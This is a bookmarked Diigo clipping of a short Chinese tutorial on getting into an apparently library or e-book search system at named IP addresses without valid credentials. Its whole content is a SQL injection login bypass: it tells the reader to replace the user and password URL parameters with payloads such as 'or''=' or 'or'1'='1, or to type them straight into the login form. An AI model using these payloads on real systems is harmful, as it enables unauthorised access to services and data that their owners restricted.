Skip to main content
You are here: Diigo Home > Wind Cold's Bookmarks
Tags: ssreader on 2007-06-24 -All Annotations (2) -About
more fromwww.chinadforce.com
Notation: * = Private bookmark and comment|… = Clipping [?] | … = Public highlight [?]
http://124.133.52.134/wenhua/index.asp
++++++++++++++++++++++++++++++++++++++++++++
搜索需要输入用户名、密码
我们可以构造查询条件,突破限制
做法如下:
1.随便输入学号、密码,登陆,例如:学号=1,密码=1.这时会出现“此用户不存在!返回”
ie地址栏中地址为http://218.17.219.22/bookhtm/sq/ ... B1.x=41&B1.y=12
2.修改地址进入:
将上面地址中user=1&mima=1改为:user='or''='&mima='or''='
或者user='or'1'='1&mima='or'1'='1 也可使用改后地址为http://124.133.52.134/wenhua/sq/load.asp?user='or''='&mima='or''='&B1.x=41&B1.y=12
直接填
名:'or''='
密:'or''='
就进了~